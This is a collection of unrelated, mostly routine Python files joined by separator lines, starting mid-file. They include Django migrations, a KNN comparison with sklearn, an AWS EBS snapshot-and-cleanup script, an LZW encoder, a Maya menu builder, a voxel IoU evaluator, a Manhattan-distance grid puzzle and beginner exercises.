    # 'Eliminar' >> FileSystems.delete (["archivos/Info_carga_avon.1.txt"])
    jobObject = pipeline.run()
    # jobID = jobObject.job_id()
    return ("Corrio Full HD")
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-28 20:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add users.User.last_4_digits (CharField, default '0000').

    NOTE(review): presumably the last four digits of a payment card —
    confirm against the app's billing code.
    """
    dependencies = [
        ('users', '0002_auto_20170228_1941'),
    ]
    operations = [
        migrations.AddField(
            model_name='user',
            name='last_4_digits',
            field=models.CharField(default='0000', max_length=4),
        ),
    ]
|
from Tested_Method.MethodToTest import Add,ComplexFunc
from unittest.mock import patch
# Dotted path of the module under test; names are patched where they are
# looked up, i.e. inside this module, not where they were defined.
TESTED_MODULE = 'Tested_Method.MethodToTest'
@patch(f'{TESTED_MODULE}.Add')
def test_ComplexFunc_is_called_three_times_with_5_2_10(mock_Add):
    """ComplexFunc(x) must delegate to Add with (x, 2), (x, 10) and (x, 5)."""
    #given
    x = 2
    #when
    ComplexFunc(x)
    #then
    mock_Add.assert_any_call(x,2)
    mock_Add.assert_any_call(x,10)
    mock_Add.assert_any_call(x,5)
import fileinput
import sys
#config_file = "/usr/local/etc/colte/config.yml"
# Ansible vars file whose key lines are rewritten in place by replace() below.
config_file = "/usr/bin/colte/roles/configure/vars/main.yml"
def replace(searchExp, replaceExp):
    """Rewrite config_file in place: any line containing *searchExp* is
    replaced wholesale by *replaceExp*; all other lines pass through."""
    for current_line in fileinput.input(config_file, inplace=1):
        out_line = replaceExp if searchExp in current_line else current_line
        sys.stdout.write(out_line)
# Interactive prompts (Python 2 script: raw_input).  NOTE(review): empty
# answers are written as empty quoted strings, NOT the advertised defaults —
# confirm whether defaults should be substituted when the answer is blank.
enb_iface = raw_input('network interface that eNB connects to (default eth0): ')
enb_iface_addr = raw_input('address of network interface mentioned above (default 1.2.3.4/24): ')
wan_iface = raw_input('network interface that connects to Internet (default eth0): ')
lte_subnet = raw_input('subnet for assigning LTE addresses (default 192.168.151.0/24): ')
network_name = raw_input('name of LTE network (default colte): ')
# Each call replaces the whole matching config line with 'key: "value"\n'.
replace("enb_iface:", "enb_iface: \"" + enb_iface + "\"\n")
replace("enb_iface_addr:", "enb_iface_addr: \"" + enb_iface_addr + "\"\n")
replace("wan_iface:", "wan_iface: \"" + wan_iface + "\"\n")
replace("lte_subnet:", "lte_subnet: \"" + lte_subnet + "\"\n")
replace("network_name:", "network_name: \"" + network_name + "\"\n")
|
import numpy as np
from knn_implementation import KNN_Classification, KNN_Regression
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neighbors import KNeighborsRegressor
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import KFold
import matplotlib.pyplot as plt
def testWithSklearn(k, X=None, Y=None):
    """Mean leave-one-out accuracy of sklearn's KNeighborsClassifier.

    BUG FIX: the original body referenced self.X / self.Y inside a plain
    function, which raised NameError on every call.  The data is now passed
    in explicitly; the defaults keep the old single-argument call compiling.
    """
    neigh = KNeighborsClassifier(k)
    L = cross_val_score(neigh, X, Y, scoring = 'accuracy',
                        cv = KFold(n_splits=len(X)))
    return np.mean(L)
# Compare the hand-rolled KNN (knn_implementation) against scikit-learn,
# printing per-k leave-one-out accuracies side by side.
print('Test the implementation based on sklearn KNeighborsClassifier')
print('Test KNN classification, without weighted distance')
print('My solution sklearn')
myList = []
skList = []
##for k in range(1, 20):
## knn = KNN_Classification('./data/ionosphere.arff.txt', k)
##
## myRes = knn.LOOCV()
##
## neigh = KNeighborsClassifier(k)
## L = cross_val_score(neigh, knn.X, knn.Y, scoring = 'accuracy',
## cv = KFold(n_splits=len(knn.X)))
##
## skRes = np.mean(L)
## myList.append(myRes)
## skList.append(skRes)
## print(f'{myRes:.12f}',end='')
## print(' ', skRes)
##plt.plot(myList, label='My implement')
##plt.plot(skList, label='sklearn')
##plt.xlabel('k')
##plt.ylabel('accuracy')
##plt.legend()
##plt.show()
print('\nTest KNN classification, with weighted distance')
print('My solution sklearn')
# Distance-weighted variant: both implementations weight votes by 1/distance.
for k in range(1, 20):
    knn = KNN_Classification('./data/ionosphere.arff.txt', k)
    myRes = knn.LOOCV_weight_distance()
    neigh = KNeighborsClassifier(k, weights='distance')
    L = cross_val_score(neigh, knn.X, knn.Y, scoring = 'accuracy',
                        cv = KFold(n_splits=len(knn.X)))
    skRes = np.mean(L)
    myList.append(myRes)
    skList.append(skRes)
    print(f'{myRes:.12f}',end='')
    print(' ', skRes)
plt.plot(myList, label='My implement')
plt.plot(skList, label='sklearn')
plt.xlabel('k')
plt.ylabel('accuracy')
plt.legend()
plt.show()
# NOTE(review): hard stop — everything below is intentionally unreachable.
import sys
sys.exit()
print('\nTest KNN regression, without weighted distance')
print('My solution sklearn')
# NOTE(review): despite the banner above, this calls the WEIGHTED variant.
for i in range(1, 20):
    knn = KNN_Regression('./data/autos.arff.txt', i)
    myRes = knn.LOOCV_weight_distance()
    print(f'{myRes:.12f}',end='\n')
|
from django.contrib import admin
from .models import *
# Register your models here.
class announcement_titleAdmin(admin.ModelAdmin):
    """Admin for announcement titles; the changelist shows only the title."""
    list_display=["title"]
admin.site.register(announcement_title,announcement_titleAdmin)
class announcement_dataAdmin(admin.ModelAdmin):
    """Admin for announcement bodies with the main content columns listed."""
    list_display=["title",'subtitle',"issuer",'active','content']
admin.site.register(announcement_data,announcement_dataAdmin)
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# BUG FIX: '%matplotlib inline' is an IPython magic, not Python syntax — it
# made this file a SyntaxError when run as a plain script.  Kept here as a
# comment for notebook users.
# %matplotlib inline
# Twelve month-end timestamps starting Jan 2016; squared cumulative sum of
# standard-normal draws as demo data.
dti = pd.date_range('2016/01/01', freq='M', periods=12)
rnd = np.random.standard_normal(len(dti)).cumsum()**2
df = pd.DataFrame(rnd, columns=['data'], index=dti)
df.plot()
plt.show()
|
#!/usr/bin/env python3
import serial
import picamera  # NOTE(review): imported but unused here — presumably for a later camera stage; confirm
# Open the device's USB serial port at 9600 baud.
ser = serial .Serial('/dev/ttyACM0', 9600)
# Send one handshake byte, then read a single newline-terminated reply (blocks).
ser.write(b'0')
data= ser.readline()
print(data)
|
#!/usr/bin/env python
import sys
import boto.ec2
from boto.utils import get_instance_metadata
import logging
import argparse
import time
import datetime
import subprocess
# Refuse to run on interpreters older than 2.6: exit cleanly when executed
# as a script, raise when imported so the importer sees the failure.
if sys.version_info < (2, 6):
    if __name__ == "__main__":
        sys.exit("Error: we need python >= 2.6.")
    else:
        raise Exception("we need python >= 2.6")
def get_volume(conn, device):
    '''Returns volume to make snapshot'''
    # Ask the EC2 metadata service who we are, then find the EBS volume
    # attached to this instance at the requested device path.
    instance_id = get_instance_metadata()["instance-id"]
    logging.debug("Our instanceID is %s" % instance_id)
    volumes = conn.get_all_volumes(filters={
        'attachment.instance-id': instance_id,
        'attachment.device': device})
    # NOTE(review): assumes exactly one match — IndexError when nothing is
    # attached at that device; confirm that is the desired failure mode.
    logging.debug("Our volume is %s" % volumes[0])
    return volumes[0]
def stop_service(name):
    '''Stop some service, e.g. db, before doing the snapshot'''
    logging.debug("Stopping %s" % name)
    # Upstart-style stop; check_call raises CalledProcessError on failure.
    subprocess.check_call(["/sbin/stop", name])
    # Sync and sleep for 2 seconds to settle things
    subprocess.check_call(["/bin/sync"])
    time.sleep(2)
def start_service(name):
    '''Start service after doing the snapshot'''
    logging.debug("Starting %s" % name)
    # Upstart-style start; raises CalledProcessError on failure.
    subprocess.check_call(["/sbin/start", name])
def create_snapshot(conn, volume, snapshot_tags, snapshot_description=None):
    '''Create snapshot object with the description and tags.'''
    snapshot = volume.create_snapshot(snapshot_description)
    logging.debug("Created snapshot: %s" % snapshot)
    # Add tags to the snapshot
    # (iteritems: this script targets Python 2)
    for tagname, tagvalue in snapshot_tags.iteritems():
        snapshot.add_tag(tagname, tagvalue)
    logging.debug("Tagged snapshot: %s with tags: %s"
                  % (snapshot, snapshot_tags))
    return snapshot
def params_to_dict(tags):
    """ Reformat tag-value params into dictionary.

    Each item of *tags* is the list argparse produces for nargs="*", whose
    first element is a "Name:value" string.  BUG FIX: split on the FIRST
    colon only, so values that themselves contain colons (timestamps, ARNs)
    survive intact — the old split(':') made dict() raise ValueError.
    """
    tags_name_value_list = [tag[0].split(':', 1) for tag in tags]
    return dict(tags_name_value_list)
def cleanup_snapshots(conn, snapshots_tags, retention):
    '''Delete older than retention age snapshots with specified tags.

    Returns the list of deleted snapshots, or None when nothing matched.
    '''
    # Date for older snapshots
    retention_date = (datetime.datetime.today() -
                      datetime.timedelta(days=retention)
                      ).strftime('%Y-%m-%dT%H:%M:%S')
    logging.debug("Retention date: %s" % retention_date)
    # Form filter dictionary (iteritems: this script targets Python 2)
    filter_dict = {}
    for key, val in snapshots_tags.iteritems():
        filter_dict["tag:" + key] = val
    snapshots = conn.get_all_snapshots(owner="self", filters=filter_dict)
    # BUG FIX: the original used "...tags:" % snapshots with no %s
    # placeholder, which raises TypeError whenever DEBUG logging is on.
    logging.debug("Snapshots list that matches tags: %s" % snapshots)
    # Delete stale snapshots (ISO-8601 strings compare chronologically)
    if snapshots:
        stale_snapshots = [snapshot for snapshot in snapshots
                           if snapshot.start_time < retention_date]
        logging.debug("Stale snapshots that are older"
                      "than retention date %s: %s"
                      % (retention_date, stale_snapshots))
        for snapshot in stale_snapshots:
            snapshot.delete()
            logging.info("Deleted snapshot: %s" % snapshot)
    else:
        stale_snapshots = None
    return stale_snapshots
def main():
    """Entry point: snapshot the EBS volume at --device (optionally stopping
    a service around the snapshot), tag it, then delete snapshots carrying
    the same tags that are older than --retention days."""
    # Parse all arguments
    epilog = "EXAMPLE: %(prog)s --device /dev/xvdg --tag-value Environment:dev --tag-value Role:mysql-backup"
    # BUG FIX: the second line of the description used to be a free-standing
    # string expression (no continuation), so argparse silently never saw it;
    # implicit literal concatenation inside parentheses joins both parts.
    description = ("Create snapshot for EBS volume with some data with optional stop of some service "
                   "that produced that data. Older than retention time snapshots are deleted")
    parser = argparse.ArgumentParser(description=description, epilog=epilog)
    parser.add_argument("--snapshot-description", "-T",
                        type=str, default=None,
                        help="The description to create snapshot with")
    parser.add_argument("--service", "-s",
                        type=str, default=None,
                        help="Service to stop before and start after the volume snapshot")
    parser.add_argument("--device", "-d",
                        type=str,
                        required=True,
                        help="Device of the volume snapshot")
    parser.add_argument("--retention", "-r",
                        type=int, default=30,
                        help="Delete snapshots older than specified"
                             "retention days period")
    parser.add_argument("--tag-value", "-t",
                        dest="tags",
                        action="append",
                        nargs="*",
                        required=True,
                        help="Tag:value to mark volume with,"
                             "used to cleanup older volumes as well.")
    parser.add_argument("--loglevel",
                        type=str, default='INFO',
                        choices=['DEBUG', 'INFO', 'WARNING',
                                 'ERROR', 'CRITICAL',
                                 'debug', 'info', 'warning',
                                 'error', 'critical'],
                        help="set output verbosity level")
    args = parser.parse_args()
    # Print help on missing arguments
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)
    tags_dict = params_to_dict(args.tags)
    logging.basicConfig(format='%(asctime)s %(name)s %(levelname)s: %(message)s',
                        level=getattr(logging, args.loglevel.upper(), None))
    # Output will be like: "2013-05-12 13:00:09,934 root WARNING: some warning text"
    logging.info("====================================================")
    logging.info("Started backup of volume")
    logging.debug("Used volume device: %s" % args.device)
    logging.debug("Used snapshot tags: %s" % tags_dict)
    logging.debug("Used snapshot retention period: %s" % args.retention)
    logging.debug("Used snapshot description: %s" % args.snapshot_description)
    # NOTE: for EC2 connection we rely on the presence of:
    # * ~/.boto or /etc/boto.cfg config files or
    # * AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY environmental variables
    # * or IAM instance profile
    # BEST-PRACTICE FIX: the bare `except:` clauses below also swallowed
    # SystemExit/KeyboardInterrupt; `except Exception:` keeps the logging
    # behaviour while letting real interrupts propagate.
    try:
        conn = boto.ec2.connect_to_region(get_instance_metadata()
                                          ["placement"]
                                          ["availability-zone"][:-1])
    except Exception:
        logging.exception("Failure getting EC2 API connection")
        sys.exit(1)
    try:
        volume = get_volume(conn, args.device)
    except Exception:
        logging.exception("Failure getting the volume")
        sys.exit(1)
    # Stop service before making snapshot
    if args.service:
        try:
            stop_service(args.service)
        except Exception:
            logging.exception("Failure stopping %s" % args.service)
        else:
            logging.info("%s stopped for backup" % args.service)
    # Make snapshot, tag it and start any service
    try:
        snapshot = create_snapshot(conn, volume,
                                   tags_dict,
                                   args.snapshot_description)
    except Exception:
        logging.exception("Failure making snapshot")
        sys.exit(1)
    else:
        logging.info("Created new snapshot %s" % snapshot)
        logging.info("Tagged snapshot with tags %s" % tags_dict)
    finally:
        # Always restart the service, even if snapshotting failed.
        if args.service:
            start_service(args.service)
    # Perform cleanup of older snapshots
    try:
        removed_snapshots = cleanup_snapshots(conn,
                                              tags_dict,
                                              args.retention)
    except Exception:
        logging.exception("Failure cleaning up snapshots")
        sys.exit(1)
    else:
        if removed_snapshots:
            logging.info("Deleted stale snapshots %s" % removed_snapshots)
        else:
            logging.info("No stale snapshots were removed")
    logging.info("====================================================")
if __name__ == '__main__':
    main()
|
import numpy as np  # kept: pre-existing file-level import (unused in this section)

def lzw_encode(symbols):
    """LZW-encode a list of single-character symbols.

    The table starts with the 256 one-byte strings (code == ord(char)) and
    grows by one phrase per emitted code.  Returns the list of output codes.
    PERFORMANCE FIX: the original used `in table` / `table.index(p)` on a
    list (O(n) per step); a phrase->code dict makes each step O(1).
    Robustness: an empty input yields an empty code list instead of raising.
    """
    codes = {chr(i): i for i in range(256)}
    next_code = 256
    output = []
    if not symbols:
        return output
    phrase = symbols[0]
    for sym in symbols[1:]:
        candidate = phrase + sym
        if candidate in codes:
            phrase = candidate
        else:
            output.append(codes[phrase])
            codes[candidate] = next_code
            next_code += 1
            phrase = sym
    output.append(codes[phrase])
    return output

def _run():
    """Read lzw_input.txt (one symbol per stripped line), compress it, and
    write one code per line to lzw_compressed.lzw."""
    input_chars = []
    with open('lzw_input.txt', 'r') as in_file:
        for line in in_file:
            input_chars.append(line.strip())
    output_nums = lzw_encode(input_chars)
    with open('lzw_compressed.lzw', 'w') as out_file:
        for n in output_nums:
            out_file.write(str(n)+'\n')

if __name__ == '__main__':
    _run()
|
import pymel.core as pm
import maya.cmds as cmds
import maya.mel as mel
import os
from xml.dom.minidom import parse
menu_label = ''  # unused placeholder, kept for backward compatibility
menu_name = 'TAS_Tools'  # name of the top-level Maya menu this package manages
def get_root_path():
    """Absolute path of the 'Tools' folder two levels above this file."""
    package_dir = os.path.abspath(os.path.join(__file__, "../.."))
    return os.path.join(package_dir, "Tools")
def load_info(filename):
    """Parse a tool_info.xml file.

    Returns a (department, app name, command-script path) tuple on success,
    or an empty dict when parsing fails or expected tags are missing.
    NOTE(review): 'appname'/'dept'/'script_path' stay unbound when their tags
    or a *command.py file are absent — the bare except below then swallows
    the NameError and {} is returned silently.  Best-effort by design.
    """
    dom = parse(filename)
    tool_info = {}
    try:
        rootTree = dom.getElementsByTagName('ToolInfo')
        # Get the name
        for node in rootTree[0].getElementsByTagName("Name"):
            appname = node.firstChild.data
        # Get the departments
        for node in rootTree[0].getElementsByTagName("Department"):
            dept = node.firstChild.data
        # Get the ToolHelp
        for node in rootTree[0].getElementsByTagName("ToolHelp"):
            tool = node.firstChild.data
        # Get the description
        for node in rootTree[0].getElementsByTagName("Description"):
            desc = node.firstChild.data
        # Get the application path: first sibling file ending in command.py
        basepath = os.path.dirname(filename)
        for filename in os.listdir(basepath):
            if filename.endswith("command.py"):
                script_path = os.path.join(basepath,filename)
        #collection = appname, tool, desc
        #tool_info [dept] = collection
        tool_info = dept, appname, script_path
    except:
        # Malformed tool_info.xml files are skipped silently.
        pass
    return tool_info
def buildMenu(parent):
    """ Searches the root folder for tools and folders. These are added
        to the parent menu and sorted.
    Args:
        parent: parent menu item to add items to
        root: find tools starting in this folder
    """
    root = get_root_path()
    if not os.path.exists(root):
        return
    menu_tool = []
    menu_items = []
    # Generate the list of menu items.
    # tool_info.xml marks a tool; sub_menu.xml marks a folder that becomes a sub-menu.
    for root, dirs, files in os.walk(root):
        for file in files:
            if file.endswith("tool_info.xml"):
                tool_file = os.path.join(root, file)
                tool_info = load_info(tool_file)
                menu_tool.append(tool_info)
            if file.endswith("sub_menu.xml"):
                menu_item = os.path.basename(root)
                menu_items.append(menu_item)
    # Create the sorted menu.
    # Group tools by department: dept -> [(app name, script path), ...]
    tool_dict = dict()
    print menu_tool
    for tool in menu_tool:
        if tool[0] in tool_dict:
            # append the new number to the existing array at this slot
            tool_dict[tool[0]].append((tool[1], tool[2]))
        else:
            # create a new array in this slot
            tool_dict[tool[0]] = [(tool[1], tool[2])]
    # print tool_dict, "KK"
    ''' [(u'Animation', u'GPU Cache Switch', 'C:\\Users\\t_adame\\Documents\\Git\\TAS_Dev\\Maya_Scripts\\Tools\\Animation\\GPU_Cache\\command.py'),
    (u'Utilities', u'Object Counter ', 'C:\\Users\\t_adame\\Documents\\Git\\TAS_Dev\\Maya_Scripts\\Tools\\Utilities\\ObjectCounter\\command.py'),
    (u'Utilities', u'Smooth Toogle', 'C:\\Users\\t_adame\\Documents\\Git\\TAS_Dev\\Maya_Scripts\\Tools\\Utilities\\SmoothToogle\\command.py')]
    '''
    # One sub-menu per department that has a sub_menu.xml marker; each tool
    # item runs its command.py via execfile (Python 2 / Maya).
    for menu_name, menu_data in tool_dict.iteritems() :
        if menu_name in menu_items:
            sub_menu = pm.menuItem(label=menu_name, subMenu=True, p=parent, tearOff=True, postMenuCommandOnce=True)
            #sub_menu = pm.subMenuItem(label=menu_name, subMenu=True, p=parent, tearOff=True, postMenuCommandOnce=True)
            for app, cmd in menu_data:
                script_cmd='execfile(r"{}");'.format(cmd)
                pm.menuItem(label=app, command=script_cmd, parent=sub_menu)
def createMenus():
    """ setup menu creation for tools in a folder and its subfolders
    Args:
        rootFolder: path to the start of a folder structure with tool infos in them
    """
    # Get gMainWindow from mel command
    main_window = mel.eval("$temp=$gMainWindow")
    # search and delete old menuName
    unload_menus()
    # Add userMenu to Maya Menu
    # NOTE(review): menu_name is a module-level global defined outside this chunk.
    tools_menu = pm.menu(menu_name, parent=main_window)
    print ('Building Menu : ' + menu_name)
    # Add recursive menus
    buildMenu(tools_menu)
def unload_menus():
    """Remove this tool's menu from the Maya main window, if present."""
    # Get gMainWindow from mel command
    main_window = mel.eval("$temp=$gMainWindow")
    # The menuArray query returns None when the window holds no menus;
    # fall back to an empty list so iteration does not raise TypeError.
    menu_list = pm.window(main_window, query=True, menuArray=True) or []
    for menu in menu_list:
        if menu == menu_name:
            # Empty the menu before deleting its UI element.
            pm.menu(menu, edit=True, deleteAllItems=True)
            pm.deleteUI(menu)
            print ('Unloading Menu : ' + menu_name)
            break
|
import os
import numpy as np
import sys
# Require the dataset name and the ground-truth directory on the command line.
if len(sys.argv) < 2:
    print 'Input your data name and groud_truth dir eg. chair ../Data/chair/train_3d/'
    sys.exit()
voxel_name = sys.argv[1]  # e.g. "chair"
data_dir = sys.argv[2]    # directory containing ground-truth point files
# load fake data name
dir = []  # NOTE(review): shadows builtin dir(); holds generated-sample folder names
def load_name():
    """Fill the global `dir` list with entries under ./<voxel_name> whose
    name minus a 5-character suffix equals voxel_name, then sort it."""
    for filename in os.listdir('./'+voxel_name):
        # filename[0:-5] strips a 5-char suffix — presumably an index such
        # as "_0001"; TODO confirm the sample folder naming convention.
        if filename[0:-5] == voxel_name:
            dir.append(filename)
    dir.sort()
def IoU_test(ground_truth, fake_data, test_name):
    """Voxelise two point sets onto a 64^3 grid and log their IoU.

    ground_truth / fake_data: arrays of (x, y, z) voxel coordinates.
    Writes details to the global IoU_detail file and the IoU value to
    the global IoU file.
    """
    # Rasterise ground-truth points into a binary occupancy grid.
    data = np.zeros((64, 64, 64,1))
    for i in ground_truth:
        data[int(i[0]), int(i[1]), int(i[2]),0] = 1
    ground_truth = data
    # Same for the generated (fake) points.
    data = np.zeros((64, 64, 64,1))
    for i in fake_data:
        data[int(i[0]), int(i[1]), int(i[2]),0] = 1
    fake_data = data
    ground_truth = np.reshape(ground_truth,(64,64,64)) # real
    fake_data= np.reshape(fake_data,(64,64,64)) # fake
    #### overlap ####
    tmp = np.logical_and(fake_data , ground_truth) # fake_data & real
    x,y,z = np.where(tmp == 1)
    overlap = len(x)
    #### diff ####
    # Voxels present in the fake data but not in the intersection.
    diff_real = fake_data - tmp
    x,y,z = np.where(diff_real == 1)
    diff = len(x)
    #### real ####
    x,y,z = np.where(ground_truth == 1)
    real = len(x)
    IoU_detail.write(test_name +'\n')
    print 'overlap: %d, real: %d, diff: %d' % (overlap,real,diff)
    IoU_detail.write('overlap: %d, real: %d, diff: %d' % (overlap,real,diff) +'\n')
    # Union = real + diff: real already contains the overlap, diff adds
    # the fake-only voxels.
    iou = (float(overlap)/(real+diff)) # intersection-over-union
    print 'IoU :', iou
    IoU.write(str(iou)+'\n')
    IoU_detail.write('IoU :%f' % iou +'\n')
if __name__ == '__main__':
    # Two output files: per-sample details and bare IoU values.
    IoU_detail = open('IoU_detail_' + voxel_name + '.txt','w')
    IoU = open('IoU_' + voxel_name +'.txt','w')
    load_name()
    real_data = os.listdir(data_dir)
    real_data.sort()
    # Compare the first 100 generated samples against ground truth.
    for i in range(100):
        try:
            ground_truth = np.loadtxt(data_dir + real_data[i]) # real
            test_name = voxel_name + '/' + dir[i] + '/fake_' + dir[i] + '.asc'
            fake_data = np.loadtxt(test_name) # fake
        except:
            # Missing or unreadable sample: report and continue.
            print voxel_name + '/' + dir[i] +'/fake_' + dir[i] + '.asc_ERROR'
            continue
        IoU_test(ground_truth, fake_data, test_name)
    IoU_detail.close()
    IoU.close()
|
# Generated by Django 2.1.2 on 2018-11-28 13:15
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds the nullable boolean column `temp_status_data` to the
    # `mahasiswa` table.
    dependencies = [
        ('datawarehouse', '0009_mahasiswa_temp_cuti'),
    ]
    operations = [
        migrations.AddField(
            model_name='mahasiswa',
            name='temp_status_data',
            # NOTE(review): NullBooleanField was deprecated in later Django
            # versions (BooleanField(null=True)); valid for Django 2.1.
            field=models.NullBooleanField(),
        ),
    ]
|
import os,re
def get_filenames_reursively(file_pattern, path_to_search):
    """Walk *path_to_search* and return full paths of every file found.

    When *file_pattern* is a non-empty regex, only paths matching it
    (via re.findall) are returned.
    """
    all_paths = []
    for walk_root, _dirs, names in os.walk(path_to_search):
        all_paths.extend(os.path.join(walk_root, name) for name in names)
    if not file_pattern:
        return all_paths
    pattern = re.compile(file_pattern)
    return [p for p in all_paths if pattern.findall(p)]
allfilepaths = get_filenames_reursively(".yaml","/home/tmunjal/Desktop/somefolder")
|
import setuptools
# Read the long description once; the original re-opened README.md a
# second time inside setup() and never closed that handle.
with open("README.md", "r") as fh:
    long_description = fh.read()
setuptools.setup(
    name='prcolor',
    version='0.1.43',
    author="Rashe",
    description="Color your print()",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/Rashe/p_color",
    packages=setuptools.find_packages()
)
|
from django.conf.urls import url
from . import views
# URL routes for this app.
# NOTE(review): Django URL patterns normally omit the leading slash after
# the include prefix (e.g. r'^register$'); these r'^/...' patterns only
# match if the including URLconf leaves a slash in place — verify against
# the project urls.py.
urlpatterns = [
    url(r'^/register$',views.register),
    url(r'^/login$',views.login),
    url(r'^/weibo/url$', views.users_weibo_url),
    url(r'^/weibo/token$', views.users_weibo_token),
]
echo "hello.py"
|
import os
import sys
import math
import itertools
def setup():
    """Read comma-separated "x,y" lines from a user-chosen file into the
    module globals `coordinates`, `maxX` and `maxY`.

    Prompts for a filename (default input2.txt) and terminates with a
    message when the file is missing or empty.
    """
    global fileHandle, coordinates, maxX, maxY
    filename = input("Enter an input file name (default input2.txt): ")
    if filename == "":
        filename = "input2.txt"
    path = "./%s" % filename
    # Check existence BEFORE size: the original called os.path.getsize()
    # unconditionally, which raises OSError on a missing file, and its
    # bare `exit` (no call parentheses) never actually terminated.
    if not os.path.isfile(path) or os.path.getsize(path) == 0:
        print("File doesn't exist or is empty.")
        exit()
    fileHandle = open(path, "r")
    maxX = 0
    maxY = 0
    coordinates = []
    for line in fileHandle:
        temp = line.rstrip().split(",")
        coordinates.append((int(temp[0]), int(temp[1])))
        # Save the max X and Y coordinate values
        if int(temp[0]) > maxX:
            maxX = int(temp[0])
        if int(temp[1]) > maxY:
            maxY = int(temp[1])
    # Adjust for origin
    maxX += 1
    maxY += 1
    fileHandle.close()
def printGrid():
    """Print the global `grid` row by row (debug helper)."""
    for row in grid:
        print (''.join([str(element) for element in row]))
    print ()
def plotPoints():
    """Mark each input coordinate on the global grid with its index label."""
    for (label,(x,y)) in enumerate(coordinates):
        grid[y][x] = label
def manhattanDistance(posn1, posn2):
    """Return the Manhattan (L1) distance between two (x, y) points."""
    dx = posn1[0] - posn2[0]
    dy = posn1[1] - posn2[1]
    return abs(dx) + abs(dy)
def areaIsFinite(area):
    """Return False when the labelled region touches the grid border.

    A region reaching the border would extend forever on an unbounded
    plane, so it is treated as infinite.
    """
    finite = True
    # An area is infinite if it has a point on the border of the grid.
    for x in range(maxX):
        if grid[0][x] == area or grid[maxY-1][x] == area:
            finite = False
    for y in range(maxY):
        if grid[y][0] == area or grid[y][maxX-1] == area:
            finite = False
    return finite
def calculateArea(label):
    """Count the grid cells currently assigned to `label`."""
    size = 0
    for (x,y) in itertools.product(range(maxX), range(maxY)):
        if grid[y][x] == label:
            size += 1
    return size
def plotClosestLocations():
    """Assign every grid cell the label of its nearest input coordinate
    (Manhattan distance); cells tied between locations get '.'."""
    x = 0
    y = 0
    closestLocation = 0
    for (x,y) in itertools.product(range(maxX), range(maxY)): # For each point in the grid
        for (label,location) in enumerate(coordinates): # For each input coord. pair
            distance = manhattanDistance((x,y), location)
            if label == 0:
                closestLocation = distance # Set a default location
                grid[y][x] = label
            elif distance == closestLocation: # Tied with another location
                grid[y][x] = '.'
            elif distance < closestLocation: # Current location is closer to (x,y)
                closestLocation = distance
                grid[y][x] = label
def findLargestFiniteArea():
    """Print the area of each finite region and the largest among them."""
    largestArea = 0
    for (label,location) in enumerate(coordinates):
        if areaIsFinite(label):
            area = calculateArea(label)
            if area > largestArea:
                largestArea = area
            print("Area", label, location, "->", area)
    print ("Largest Area:", largestArea)
# --- Script entry: build the grid and solve the puzzle ---
setup()
# NOTE(review): `global` at module level is a no-op; kept from the original.
global grid
grid = [['.' for x in range(maxX)] for y in range(maxY)]
plotPoints()
#printGrid()
print("Assigning grid points to locations...")
plotClosestLocations()
#printGrid()
print("---Finite Areas---")
findLargestFiniteArea()
import sys
import numpy as np
import matplotlib.pyplot as plt
log_fname = sys.argv[1]
lite = True   # when True, skip the histogram plots and only show the weather plot
data = {}     # rank -> list of timestamps
cn_ts = 0     # total number of timestamps parsed
with open(log_fname) as f:
    for line in f:
        cols = line.split()
        # Expected line format: "<rank> <timestamp>".
        if len(cols) == 2:
            try:
                rank = int(cols[0])
                ts = float(cols[1])
                if rank not in data:
                    data[rank] = [ts]
                else:
                    data[rank].append(ts)
                cn_ts += 1
            except:
                print(f'unexpected two columns data: {line}')
                pass
# Clean up data by excluding ranks that ran for more than 10 mins
# Also collect the first timestamp of each rank so we can sort
# and display it according to the time order (and not the rank order)
deltas = []
first_ts = []
ranks = []
print(f'#ts={cn_ts}')
excluded_ranks = []
for rank, ts_list in data.items():
    min_ts=min(ts_list)
    max_ts=max(ts_list)
    if max_ts - min_ts > 600: # each rank should not run for more than n seconds
        excluded_ranks.append(rank)
    else:
        deltas.append(len(ts_list))
        if len(ts_list) > 0:
            first_ts.append(ts_list[0])
            ranks.append(rank)
sorted_indices = np.argsort(first_ts)
sorted_ranks = [ranks[i] for i in sorted_indices]
print(f'excluded ranks={excluded_ranks}')
# Display average processing time
if not lite:
    deltas = np.asarray(deltas)
    plt.hist(deltas, bins=100)
    thres = np.average(deltas) + ( np.std(deltas) )
    plt.title(f"#Evt per rank. avg={np.average(deltas):.2f} max={np.max(deltas):.2f} min={np.min(deltas):.2f}")
    plt.show()
# Display weather plot according to the first ts
deltas = []
for rank in sorted_ranks:
    ts_list = data[rank]
    if rank not in excluded_ranks:
        plt.scatter([rank]*len(ts_list), ts_list, s=2, marker='o')
        # calculate delta
        # NOTE(review): ts_arr is computed but unused; the subtraction below
        # works because np.roll returns an ndarray, which broadcasts the list.
        ts_arr = np.asarray(ts_list)
        deltas.extend(list(ts_list - np.roll(ts_list, 1))[1:])
plt.title('Weather plot')
plt.show()
# Plot histogram of deltas
if not lite:
    deltas = np.asarray(deltas)
    plt.hist(deltas, bins=100)
    thres = np.average(deltas) + ( np.std(deltas) )
    plt.title(f"Reading time (s) per evt. #points more than {thres:.2f} (s): {len(deltas[deltas>thres]):d} avg={np.average(deltas):.2f} max={np.max(deltas):.2f} min={np.min(deltas):.2f}")
    plt.show()
|
# Challenge 008
# Ask for the total price of the bill, then ask how many diners there are. Divide the total
# bill by the number of diners and show how much each person must pay.
"""
total_price = int(input("what is the total price of the bill?: "))
number_of_diners = int(input("How many diners are there?: "))
each_person_pay = total_price/number_of_diners
print(f'Each person must pay: {each_person_pay} $')
"""
# Challenge 012
# Ask for two numbers. If the first one is larger than the second, display the second number
# first and then the first number, otherwise show the first number first and then the second.
"""
first_number = float(input("Enter the first number: "))
second_number = float(input("Enter the second number: "))
if first_number > second_number:
print(second_number)
print(first_number)
else:
print(first_number)
print(second_number)
"""
# Ask the user to enter a number that is under 20. If they enter a number that is 20 or more,
# display the message “Too high”, otherwise display “Thank you”
"""
number = float(input("Enter a number less than 20: "))
if number >= 20:
print("Too high")
else:
print("Thank you")
"""
